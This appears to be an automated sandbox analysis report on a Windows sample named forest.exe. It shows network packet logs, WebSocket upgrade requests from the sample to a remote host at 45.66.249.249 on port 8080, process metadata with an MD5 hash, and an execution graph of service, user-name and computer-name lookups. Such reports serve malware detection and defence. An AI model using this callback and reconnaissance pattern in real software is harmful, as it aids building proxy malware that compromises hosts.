Sep 18, 2024 17:04:12.612214088 CEST497108443192.168.2.345.66.249.249
Sep 18, 2024 17:04:12.612720013 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:04:12.617608070 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:04:12.617686033 CEST84434971045.66.249.249192.168.2.3
Sep 18, 2024 17:04:12.617707968 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:04:12.617738008 CEST497108443192.168.2.345.66.249.249
Sep 18, 2024 17:04:12.618813992 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:04:12.623774052 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:04:12.623819113 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:04:13.221874952 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:04:13.221962929 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:04:13.222059011 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:04:13.222455025 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:04:13.223540068 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:04:13.227200031 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:04:13.228312016 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:04:13.507090092 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:04:13.559269905 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:04:22.203249931 CEST497138080192.168.2.345.66.249.249
Sep 18, 2024 17:04:22.208296061 CEST80804971345.66.249.249192.168.2.3
Sep 18, 2024 17:04:22.208375931 CEST497138080192.168.2.345.66.249.249
Sep 18, 2024 17:04:22.208579063 CEST497138080192.168.2.345.66.249.249
Sep 18, 2024 17:04:22.213562012 CEST80804971345.66.249.249192.168.2.3
Sep 18, 2024 17:04:22.793342113 CEST80804971345.66.249.249192.168.2.3
Sep 18, 2024 17:04:22.794042110 CEST497138080192.168.2.345.66.249.249
Sep 18, 2024 17:04:22.795984030 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:22.798883915 CEST80804971345.66.249.249192.168.2.3
Sep 18, 2024 17:04:22.800843954 CEST84434971445.66.249.249192.168.2.3
Sep 18, 2024 17:04:22.800956964 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:22.802452087 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:22.807228088 CEST84434971445.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.393440962 CEST84434971445.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.393460035 CEST84434971445.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.393789053 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.395421028 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.400217056 CEST84434971445.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.555887938 CEST84434971445.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.606132984 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.685611010 CEST84434971445.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.731405973 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.758392096 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.759404898 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.763232946 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.763331890 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.763663054 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.766041040 CEST84434971445.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.766113997 CEST497148443192.168.2.345.66.249.249
Sep 18, 2024 17:04:23.769110918 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:04:23.769121885 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:04:24.361772060 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:04:24.402971029 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:04:24.490489006 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:04:24.491029024 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:04:24.492088079 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:04:24.496149063 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:04:24.497062922 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:04:24.760185003 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:04:24.809173107 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:04:40.465897083 CEST497098080192.168.2.345.66.249.249
Sep 18, 2024 17:04:40.471985102 CEST80804970945.66.249.249192.168.2.3
Sep 18, 2024 17:04:52.793668032 CEST497138080192.168.2.345.66.249.249
Sep 18, 2024 17:04:52.846036911 CEST80804971345.66.249.249192.168.2.3
Sep 18, 2024 17:05:10.481394053 CEST497098080192.168.2.345.66.249.249
Sep 18, 2024 17:05:10.486351013 CEST80804970945.66.249.249192.168.2.3
Sep 18, 2024 17:05:13.819914103 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:05:13.819992065 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:05:13.820066929 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:05:13.820193052 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:05:13.820230007 CEST497128443192.168.2.345.66.249.249
Sep 18, 2024 17:05:13.825336933 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:05:13.825479031 CEST84434971245.66.249.249192.168.2.3
Sep 18, 2024 17:05:22.793735027 CEST497138080192.168.2.345.66.249.249
Sep 18, 2024 17:05:22.799981117 CEST80804971345.66.249.249192.168.2.3
Sep 18, 2024 17:05:24.830805063 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:05:24.831063032 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:05:24.831101894 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:05:24.833440065 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:05:24.833527088 CEST497158443192.168.2.345.66.249.249
Sep 18, 2024 17:05:24.838653088 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:05:24.841134071 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:05:24.843904018 CEST84434971545.66.249.249192.168.2.3
Sep 18, 2024 17:05:40.497050047 CEST497098080192.168.2.345.66.249.249
Sep 18, 2024 17:05:40.514683962 CEST80804970945.66.249.249192.168.2.3
Sep 18, 2024 17:05:52.809252977 CEST497138080192.168.2.345.66.249.249
Sep 18, 2024 17:05:53.121620893 CEST497138080192.168.2.345.66.249.249
Sep 18, 2024 17:05:53.396352053 CEST80804971345.66.249.249192.168.2.3
Sep 18, 2024 17:05:53.396367073 CEST80804971345.66.249.249192.168.2.3
Sep 18, 2024 17:06:10.512603998 CEST497098080192.168.2.345.66.249.249
Sep 18, 2024 17:06:10.517914057 CEST80804970945.66.249.249192.168.2.3
  • 45.66.249.249:8080
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.34970945.66.249.24980807660C:\Users\user\Desktop\forest.exe
TimestampBytes transferredDirectionData
Sep 18, 2024 17:04:09.885798931 CEST194OUTGET /sock HTTP/1.1
Connection: Upgrade
Upgrade: websocket
User-Agent: Where are my socks?
Sec-WebSocket-Key: bT3JIGuy/H0GfqD3c9Y3nQ==
Sec-WebSocket-Version: 13
Host: 45.66.249.249:8080
Sep 18, 2024 17:04:10.475348949 CEST147INHTTP/1.1 101
Upgrade: websocket
Connection: upgrade
Sec-WebSocket-Accept: OFd3PsvZB4PKz4cmGhZ5Zl8cFPc=
Date: Wed, 18 Sep 2024 15:04:10 GMT


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.34971345.66.249.24980807876C:\Users\user\Desktop\forest.exe
TimestampBytes transferredDirectionData
Sep 18, 2024 17:04:22.208579063 CEST194OUTGET /sock HTTP/1.1
Connection: Upgrade
Upgrade: websocket
User-Agent: Where are my socks?
Sec-WebSocket-Key: 55di3B2o1V59q09T/ftUXg==
Sec-WebSocket-Version: 13
Host: 45.66.249.249:8080
Sep 18, 2024 17:04:22.793342113 CEST147INHTTP/1.1 101
Upgrade: websocket
Connection: upgrade
Sec-WebSocket-Accept: welHrlEsH0teV4xkhsBdTOvp8+8=
Date: Wed, 18 Sep 2024 15:04:22 GMT


Click to jump to process

Click to jump to process

Click to jump to process

Target ID:0
Start time:11:04:08
Start date:18/09/2024
Path:C:\Users\user\Desktop\forest.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\forest.exe"
Imagebase:0x7ff75bcf0000
File size:688'128 bytes
MD5 hash:5242F809563EB3764684EF1180ADB902
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:2
Start time:11:04:20
Start date:18/09/2024
Path:C:\Users\user\Desktop\forest.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\forest.exe"
Imagebase:0x7ff75bcf0000
File size:688'128 bytes
MD5 hash:5242F809563EB3764684EF1180ADB902
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Reset < >

    Execution Graph

    Execution Coverage:1.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:32.8%
    Total number of Nodes:393
    Total number of Limit Nodes:23
    execution_graph 50160 7ff75bd4519c 50185 7ff75bd44e80 50160->50185 50163 7ff75bd452e8 50243 7ff75bd45968 7 API calls 2 library calls 50163->50243 50164 7ff75bd451b8 __scrt_acquire_startup_lock 50166 7ff75bd452f2 50164->50166 50168 7ff75bd451d6 50164->50168 50244 7ff75bd45968 7 API calls 2 library calls 50166->50244 50169 7ff75bd451fb 50168->50169 50176 7ff75bd45218 __scrt_release_startup_lock 50168->50176 50193 7ff75bd5b8d4 50168->50193 50170 7ff75bd452fd BuildCatchObjectHelperInternal 50172 7ff75bd45281 50197 7ff75bd45ab0 50172->50197 50174 7ff75bd45286 50200 7ff75bd5b864 50174->50200 50176->50172 50242 7ff75bd4bc44 45 API calls __GSHandlerCheck_EH 50176->50242 50186 7ff75bd44e88 50185->50186 50187 7ff75bd44e94 __scrt_dllmain_crt_thread_attach 50186->50187 50188 7ff75bd44ea1 50187->50188 50192 7ff75bd44e9d 50187->50192 50245 7ff75bd5b780 50188->50245 50192->50163 50192->50164 50194 7ff75bd5b8d9 50193->50194 50195 7ff75bd5b90a 50193->50195 50194->50195 50262 7ff75bcf1de0 LoadLibraryA 50194->50262 50195->50176 50263 7ff75bd71650 50197->50263 50199 7ff75bd45ac7 GetStartupInfoW 50199->50174 50265 7ff75bd67ed4 50200->50265 50202 7ff75bd4528e 50205 7ff75bd07b00 50202->50205 50203 7ff75bd5b873 50203->50202 50271 7ff75bd68210 45 API calls _Wcsftime 50203->50271 50206 7ff75bd07b2a _Strcoll 50205->50206 50274 7ff75bd25bf0 50206->50274 50208 7ff75bd07b43 50209 7ff75bd07bba SleepEx 50208->50209 50280 7ff75bcf6660 OpenSCManagerA 50209->50280 50213 7ff75bd07bf6 50214 7ff75bd0f390 41 API calls 50213->50214 50215 7ff75bd07c1a 50214->50215 50327 7ff75bd0aaf0 50215->50327 50217 7ff75bd07c28 50344 7ff75bcf4f00 50217->50344 50220 7ff75bd0aaf0 41 API calls 50221 7ff75bd07cf5 50220->50221 50222 7ff75bcf4f00 41 API calls 50221->50222 50223 7ff75bd07d02 50222->50223 50356 7ff75bd44d38 50223->50356 50226 7ff75bd0aaf0 41 API calls 50227 7ff75bd07dca 50226->50227 50228 7ff75bd44d38 std::_Facet_Register 41 API calls 50227->50228 50229 7ff75bd07ddc 50228->50229 50365 7ff75bcf44f0 50229->50365 50231 7ff75bd07de8 50232 7ff75bd44d38 std::_Facet_Register 41 API calls 50231->50232 50233 7ff75bd07df5 MultiByteToWideChar 50232->50233 50234 7ff75bd45084 50233->50234 50235 7ff75bd07e42 MultiByteToWideChar MultiByteToWideChar 50234->50235 50236 7ff75bd45084 50235->50236 50237 7ff75bd07ea8 MultiByteToWideChar 50236->50237 50238 7ff75bd44d38 std::_Facet_Register 41 API calls 50237->50238 50239 7ff75bd07ee2 50238->50239 50376 7ff75bcf46d0 SHTestTokenMembership 50239->50376 50241 7ff75bd07eea 50242->50172 50243->50166 50244->50170 50246 7ff75bd688f0 50245->50246 50247 7ff75bd44ea6 50246->50247 50250 7ff75bd61afc 50246->50250 50247->50192 50249 7ff75bd47120 7 API calls 2 library calls 50247->50249 50249->50192 50261 7ff75bd54190 EnterCriticalSection 50250->50261 50252 7ff75bd61b0c 50253 7ff75bd6218c 43 API calls 50252->50253 50254 7ff75bd61b15 50253->50254 50255 7ff75bd61b23 50254->50255 50256 7ff75bd61904 45 API calls 50254->50256 50257 7ff75bd541e4 _isindst LeaveCriticalSection 50255->50257 50258 7ff75bd61b1e 50256->50258 50259 7ff75bd61b2f 50257->50259 50260 7ff75bd619f4 GetStdHandle GetFileType 50258->50260 50259->50246 50260->50255 50262->50194 50264 7ff75bd71640 50263->50264 50264->50199 50264->50264 50266 7ff75bd67ee1 50265->50266 50270 7ff75bd67f26 50265->50270 50272 7ff75bd5e2c4 50 API calls 3 library calls 50266->50272 50268 7ff75bd67f10 50273 7ff75bd67bac 65 API calls 3 library calls 50268->50273 50270->50203 50271->50203 50272->50268 50273->50270 50403 7ff75bd599f0 50274->50403 50277 7ff75bd25c02 50277->50208 50281 7ff75bd0f390 41 API calls 50280->50281 50282 7ff75bcf66e8 50281->50282 50283 7ff75bcf4f00 41 API calls 50282->50283 50284 7ff75bcf66f6 50283->50284 50285 7ff75bd0f390 41 API calls 50284->50285 50286 7ff75bcf671e 50285->50286 50287 7ff75bcf4f00 41 API calls 50286->50287 50288 7ff75bcf672c 50287->50288 50289 7ff75bd44d38 std::_Facet_Register 41 API calls 50288->50289 50290 7ff75bcf6741 50289->50290 50291 7ff75bd0aaf0 41 API calls 50290->50291 50292 7ff75bcf67a0 50290->50292 50291->50290 50433 7ff75bd0fda0 50292->50433 50294 7ff75bcf67ab 50295 7ff75bcf6820 50294->50295 50296 7ff75bcf67e2 OpenServiceA QueryServiceStatusEx 50294->50296 50297 7ff75bcf67df 50294->50297 50438 7ff75bd0e470 50295->50438 50296->50297 50301 7ff75bcf68a0 50296->50301 50297->50294 50297->50295 50297->50296 50300 7ff75bcf6876 collate 50452 7ff75bd44d10 50300->50452 50304 7ff75bcf68ab 50301->50304 50302 7ff75bd0fda0 37 API calls 50305 7ff75bcf6846 50302->50305 50461 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50304->50461 50305->50300 50305->50304 50312 7ff75bd0f390 50313 7ff75bd0f485 50312->50313 50314 7ff75bd0f3b6 50312->50314 50495 7ff75bcf29f0 41 API calls 50313->50495 50316 7ff75bd0f3c4 _LStrxfrm 50314->50316 50318 7ff75bd0f3ed 50314->50318 50319 7ff75bd0f43d 50314->50319 50316->50213 50320 7ff75bd44d38 std::_Facet_Register 41 API calls 50318->50320 50321 7ff75bd0f47f 50318->50321 50324 7ff75bd44d38 std::_Facet_Register 41 API calls 50319->50324 50326 7ff75bd0f408 _LStrxfrm 50319->50326 50322 7ff75bd0f403 50320->50322 50494 7ff75bcf2950 41 API calls 2 library calls 50321->50494 50322->50326 50493 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50322->50493 50324->50326 50326->50213 50328 7ff75bd0ab19 50327->50328 50329 7ff75bd0ab41 50328->50329 50333 7ff75bd0ab68 50328->50333 50334 7ff75bd0abbb 50328->50334 50342 7ff75bd0abfa 50328->50342 50329->50217 50335 7ff75bd0abf4 50333->50335 50338 7ff75bd44d38 std::_Facet_Register 41 API calls 50333->50338 50337 7ff75bd0ab86 _LStrxfrm 50334->50337 50339 7ff75bd44d38 std::_Facet_Register 41 API calls 50334->50339 50497 7ff75bcf2950 41 API calls 2 library calls 50335->50497 50337->50217 50341 7ff75bd0ab7e 50338->50341 50339->50337 50341->50337 50496 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50341->50496 50498 7ff75bcf29f0 41 API calls 50342->50498 50345 7ff75bcf4f58 50344->50345 50499 7ff75bd0a680 50345->50499 50347 7ff75bcf4f9c 50348 7ff75bd0a680 41 API calls 50347->50348 50349 7ff75bcf4fc9 50348->50349 50350 7ff75bcf4ff8 collate 50349->50350 50353 7ff75bcf502f 50349->50353 50351 7ff75bd44d10 ctype 8 API calls 50350->50351 50352 7ff75bcf501f 50351->50352 50352->50220 50505 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50353->50505 50358 7ff75bd44d43 50356->50358 50357 7ff75bd07dae 50357->50226 50358->50357 50360 7ff75bd44d62 50358->50360 50507 7ff75bd5a7b0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 50358->50507 50361 7ff75bd44d6d 50360->50361 50508 7ff75bd1fc0c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 50360->50508 50509 7ff75bcf2950 41 API calls 2 library calls 50361->50509 50364 7ff75bd44d73 50366 7ff75bcf4522 MultiByteToWideChar 50365->50366 50367 7ff75bcf451f 50365->50367 50368 7ff75bcf455a 50366->50368 50367->50366 50369 7ff75bcf4567 MultiByteToWideChar MultiByteToWideChar 50368->50369 50370 7ff75bd45084 50369->50370 50371 7ff75bcf45be MultiByteToWideChar MultiByteToWideChar 50370->50371 50372 7ff75bd45084 50371->50372 50373 7ff75bcf461d MultiByteToWideChar MultiByteToWideChar 50372->50373 50374 7ff75bd45084 50373->50374 50375 7ff75bcf467c MultiByteToWideChar 50374->50375 50375->50231 50377 7ff75bd71650 memcpy_s 50376->50377 50378 7ff75bcf4771 GetUserNameA 50377->50378 50379 7ff75bcf47a5 50378->50379 50379->50379 50380 7ff75bd0f390 41 API calls 50379->50380 50384 7ff75bcf47bd collate 50380->50384 50381 7ff75bcf485f GetComputerNameA 50382 7ff75bcf4893 50381->50382 50382->50382 50386 7ff75bd0f390 41 API calls 50382->50386 50383 7ff75bcf4aed 50514 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50383->50514 50384->50381 50384->50383 50390 7ff75bcf48ae collate 50386->50390 50388 7ff75bcf4955 GetModuleFileNameW 50392 7ff75bcf49a5 50388->50392 50396 7ff75bcf4995 50388->50396 50389 7ff75bcf4ae2 50512 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50389->50512 50390->50388 50390->50389 50391 7ff75bcf4950 collate 50390->50391 50391->50388 50510 7ff75bd14e80 41 API calls 3 library calls 50392->50510 50395 7ff75bcf4ae7 50513 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50395->50513 50402 7ff75bcf49c8 _LStrxfrm 50396->50402 50511 7ff75bd10210 41 API calls 5 library calls 50396->50511 50397 7ff75bd44d10 ctype 8 API calls 50400 7ff75bcf4ac1 50397->50400 50400->50241 50401 7ff75bcf4a29 collate 50401->50397 50402->50395 50402->50401 50404 7ff75bd599f9 50403->50404 50405 7ff75bd59a10 50403->50405 50421 7ff75bd51c7c 11 API calls _set_errno_from_matherr 50404->50421 50416 7ff75bd5f210 50405->50416 50408 7ff75bd599fe 50422 7ff75bd53e94 37 API calls _invalid_parameter_noinfo_noreturn 50408->50422 50411 7ff75bd25bfe 50411->50277 50415 7ff75bd1fc74 41 API calls Concurrency::cancel_current_task 50411->50415 50423 7ff75bd5e8f4 50416->50423 50421->50408 50422->50411 50424 7ff75bd5e955 50423->50424 50426 7ff75bd5e950 __vcrt_FlsAlloc 50423->50426 50432 7ff75bd5a378 45 API calls 2 library calls 50424->50432 50425 7ff75bd5e984 LoadLibraryExW 50428 7ff75bd5ea59 50425->50428 50429 7ff75bd5e9a9 GetLastError 50425->50429 50426->50424 50426->50425 50427 7ff75bd5ea79 GetProcAddressForCaller 50426->50427 50431 7ff75bd5e9e3 LoadLibraryExW 50426->50431 50427->50424 50428->50427 50430 7ff75bd5ea70 FreeLibrary 50428->50430 50429->50426 50430->50427 50431->50426 50431->50428 50434 7ff75bd0fe0e 50433->50434 50435 7ff75bd0fda5 collate 50433->50435 50434->50294 50435->50434 50462 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50435->50462 50439 7ff75bd0e4a0 50438->50439 50441 7ff75bd0e4ee 50439->50441 50467 7ff75bd0d240 41 API calls 2 library calls 50439->50467 50446 7ff75bd0e524 50441->50446 50463 7ff75bd20c94 50441->50463 50442 7ff75bd0e6c2 50469 7ff75bcf40d0 41 API calls 2 library calls 50442->50469 50443 7ff75bd0e684 50444 7ff75bcf6833 50443->50444 50468 7ff75bd0d3a0 41 API calls Concurrency::cancel_current_task 50443->50468 50444->50300 50444->50302 50446->50442 50446->50443 50448 7ff75bd0e704 50470 7ff75bd46e14 RtlPcToFileHeader RaiseException 50448->50470 50450 7ff75bd0e715 50453 7ff75bd44d19 50452->50453 50454 7ff75bcf6887 50453->50454 50455 7ff75bd456ec IsProcessorFeaturePresent 50453->50455 50454->50312 50456 7ff75bd45704 50455->50456 50491 7ff75bd458e0 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 50456->50491 50458 7ff75bd45717 50492 7ff75bd456b8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 50458->50492 50464 7ff75bd20cbc 50463->50464 50465 7ff75bd20cc3 _LStrxfrm 50463->50465 50464->50446 50465->50464 50471 7ff75bd55238 50465->50471 50467->50441 50468->50444 50469->50448 50470->50450 50472 7ff75bd55268 50471->50472 50475 7ff75bd54f9c 50472->50475 50474 7ff75bd55286 50474->50464 50476 7ff75bd54fbc 50475->50476 50477 7ff75bd54fe9 50475->50477 50476->50477 50478 7ff75bd54fc6 50476->50478 50479 7ff75bd54ff1 50476->50479 50477->50474 50489 7ff75bd53dc4 37 API calls _invalid_parameter_noinfo_noreturn 50478->50489 50482 7ff75bd54edc 50479->50482 50490 7ff75bd54404 EnterCriticalSection 50482->50490 50484 7ff75bd54ef9 50485 7ff75bd54f1c 74 API calls 50484->50485 50486 7ff75bd54f02 50485->50486 50487 7ff75bd54410 _fread_nolock LeaveCriticalSection 50486->50487 50488 7ff75bd54f0d 50487->50488 50488->50477 50489->50477 50491->50458 50494->50313 50497->50342 50500 7ff75bd0a68d 50499->50500 50501 7ff75bd0a6a4 50499->50501 50500->50347 50504 7ff75bd0a6be memcpy_s 50501->50504 50506 7ff75bd10350 41 API calls 6 library calls 50501->50506 50503 7ff75bd0a709 50503->50347 50504->50347 50506->50503 50507->50358 50509->50364 50510->50396 50511->50402 50515 7ff75bcf5ef0 50516 7ff75bd0f390 41 API calls 50515->50516 50517 7ff75bcf5f49 50516->50517 50518 7ff75bcf5f8b 50517->50518 50519 7ff75bcf60d7 50517->50519 50520 7ff75bcf5fb2 50518->50520 50521 7ff75bcf610d 50518->50521 50549 7ff75bcf2a10 39 API calls 2 library calls 50519->50549 50525 7ff75bcf6143 50520->50525 50532 7ff75bcf5ff2 50520->50532 50551 7ff75bcf2a10 39 API calls 2 library calls 50521->50551 50523 7ff75bcf60fc 50550 7ff75bd46e14 RtlPcToFileHeader RaiseException 50523->50550 50553 7ff75bcf2a10 39 API calls 2 library calls 50525->50553 50527 7ff75bcf6132 50552 7ff75bd46e14 RtlPcToFileHeader RaiseException 50527->50552 50530 7ff75bcf616b 50554 7ff75bd46e14 RtlPcToFileHeader RaiseException 50530->50554 50534 7ff75bcf6065 50532->50534 50538 7ff75bcf617f 50532->50538 50539 7ff75bcf603f 50532->50539 50533 7ff75bcf60aa collate 50535 7ff75bd44d10 ctype 8 API calls 50533->50535 50534->50533 50548 7ff75bcf61f7 50534->50548 50536 7ff75bcf60c2 50535->50536 50555 7ff75bcf2a10 39 API calls 2 library calls 50538->50555 50539->50534 50542 7ff75bcf61bb 50539->50542 50557 7ff75bcf2a10 39 API calls 2 library calls 50542->50557 50543 7ff75bcf61a7 50556 7ff75bd46e14 RtlPcToFileHeader RaiseException 50543->50556 50546 7ff75bcf61e3 50558 7ff75bd46e14 RtlPcToFileHeader RaiseException 50546->50558 50559 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50548->50559 50549->50523 50550->50521 50551->50527 50552->50525 50553->50530 50554->50538 50555->50543 50556->50542 50557->50546 50558->50548 50560 7ff75bcf5040 50561 7ff75bcf50a2 50560->50561 50562 7ff75bcf5667 50560->50562 50642 7ff75bd13e80 50561->50642 50670 7ff75bcf29f0 41 API calls 50562->50670 50565 7ff75bcf566c 50671 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50565->50671 50566 7ff75bcf50d3 50660 7ff75bd0a750 50566->50660 50569 7ff75bcf50ee 50571 7ff75bd0a750 41 API calls 50569->50571 50570 7ff75bcf5672 50672 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50570->50672 50573 7ff75bcf514f 50571->50573 50575 7ff75bd0a750 41 API calls 50573->50575 50574 7ff75bcf5678 50673 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50574->50673 50577 7ff75bcf51a6 50575->50577 50579 7ff75bd0a750 41 API calls 50577->50579 50578 7ff75bcf567e 50674 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50578->50674 50581 7ff75bcf51fa 50579->50581 50583 7ff75bd0a750 41 API calls 50581->50583 50582 7ff75bcf5684 50675 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50582->50675 50584 7ff75bcf5242 50583->50584 50584->50565 50585 7ff75bcf52a0 collate 50584->50585 50585->50570 50587 7ff75bcf52f3 collate 50585->50587 50587->50574 50589 7ff75bcf534c collate 50587->50589 50588 7ff75bcf568a 50676 7ff75bcf2a10 39 API calls 2 library calls 50588->50676 50589->50578 50591 7ff75bcf53a8 collate 50589->50591 50591->50582 50593 7ff75bcf5404 collate 50591->50593 50592 7ff75bcf569f 50677 7ff75bd46e14 RtlPcToFileHeader RaiseException 50592->50677 50665 7ff75bcf4db0 50593->50665 50597 7ff75bcf56b3 50678 7ff75bcf2a10 39 API calls 2 library calls 50597->50678 50599 7ff75bcf56c7 50679 7ff75bd46e14 RtlPcToFileHeader RaiseException 50599->50679 50600 7ff75bcf5463 50600->50597 50604 7ff75bcf548d 50600->50604 50602 7ff75bcf56db 50680 7ff75bcf2a10 39 API calls 2 library calls 50602->50680 50604->50602 50608 7ff75bcf54c7 50604->50608 50605 7ff75bcf56ef 50681 7ff75bd46e14 RtlPcToFileHeader RaiseException 50605->50681 50607 7ff75bcf5703 50682 7ff75bcf2a10 39 API calls 2 library calls 50607->50682 50608->50607 50612 7ff75bcf54e2 50608->50612 50610 7ff75bcf5717 50683 7ff75bd46e14 RtlPcToFileHeader RaiseException 50610->50683 50613 7ff75bcf572b 50612->50613 50616 7ff75bcf550a 50612->50616 50684 7ff75bcf2a10 39 API calls 2 library calls 50613->50684 50615 7ff75bcf573f 50685 7ff75bd46e14 RtlPcToFileHeader RaiseException 50615->50685 50618 7ff75bcf5753 50616->50618 50620 7ff75bcf551d 50616->50620 50686 7ff75bcf2a10 39 API calls 2 library calls 50618->50686 50623 7ff75bcf577b 50620->50623 50628 7ff75bcf5535 50620->50628 50621 7ff75bcf5767 50687 7ff75bd46e14 RtlPcToFileHeader RaiseException 50621->50687 50688 7ff75bcf2a10 39 API calls 2 library calls 50623->50688 50625 7ff75bcf5797 50689 7ff75bd46e14 RtlPcToFileHeader RaiseException 50625->50689 50627 7ff75bcf57ab 50690 7ff75bcf2a10 39 API calls 2 library calls 50627->50690 50628->50627 50630 7ff75bcf5598 50628->50630 50632 7ff75bcf55da collate 50630->50632 50634 7ff75bcf57dd 50630->50634 50631 7ff75bcf57c9 50691 7ff75bd46e14 RtlPcToFileHeader RaiseException 50631->50691 50635 7ff75bcf5636 collate 50632->50635 50637 7ff75bcf57e3 50632->50637 50692 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50634->50692 50636 7ff75bd44d10 ctype 8 API calls 50635->50636 50638 7ff75bcf564e 50636->50638 50693 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50637->50693 50643 7ff75bd13ed3 50642->50643 50646 7ff75bd13f07 _LStrxfrm 50642->50646 50644 7ff75bd13ee8 50643->50644 50645 7ff75bd13f3c 50643->50645 50647 7ff75bd44d38 std::_Facet_Register 41 API calls 50644->50647 50648 7ff75bd13f97 50644->50648 50645->50646 50651 7ff75bd44d38 std::_Facet_Register 41 API calls 50645->50651 50646->50566 50649 7ff75bd13efe 50647->50649 50695 7ff75bcf2950 41 API calls 2 library calls 50648->50695 50649->50646 50694 7ff75bd53eb4 37 API calls _invalid_parameter_noinfo_noreturn 50649->50694 50651->50646 50652 7ff75bd13f9d 50696 7ff75bd52d50 13 API calls 2 library calls 50652->50696 50655 7ff75bd13fc2 50697 7ff75bd52d50 13 API calls 2 library calls 50655->50697 50657 7ff75bd13fcb 50698 7ff75bd52d50 13 API calls 2 library calls 50657->50698 50659 7ff75bd13fd4 collate 50659->50566 50661 7ff75bd0a7b2 50660->50661 50664 7ff75bd0a773 _LStrxfrm 50660->50664 50699 7ff75bd0f0e0 41 API calls 5 library calls 50661->50699 50663 7ff75bd0a7c8 50663->50569 50664->50569 50666 7ff75bd0a680 41 API calls 50665->50666 50667 7ff75bcf4e15 50666->50667 50668 7ff75bd0a680 41 API calls 50667->50668 50669 7ff75bcf4e45 50668->50669 50669->50588 50669->50600 50676->50592 50677->50597 50678->50599 50679->50602 50680->50605 